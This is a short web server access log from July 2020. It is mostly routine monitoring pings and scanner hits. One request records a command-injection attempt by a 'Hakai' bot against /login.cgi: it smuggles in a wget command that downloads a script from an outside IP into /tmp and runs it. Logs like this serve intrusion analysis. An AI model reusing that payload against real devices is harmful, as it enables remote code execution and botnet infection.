190.216.150.163 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:16:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:08:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.121.238.192 - - [02/Jul/2020:16:09:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:16:09:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:10:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.185.21.218 - - [02/Jul/2020:16:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
95.132.31.211 - - [02/Jul/2020:16:11:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:16:11:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:12:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.126.175.8 - - [02/Jul/2020:16:12:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:16:13:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.176.194.9 - - [02/Jul/2020:16:14:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.31/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Jul/2020:16:14:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:15:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:16:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
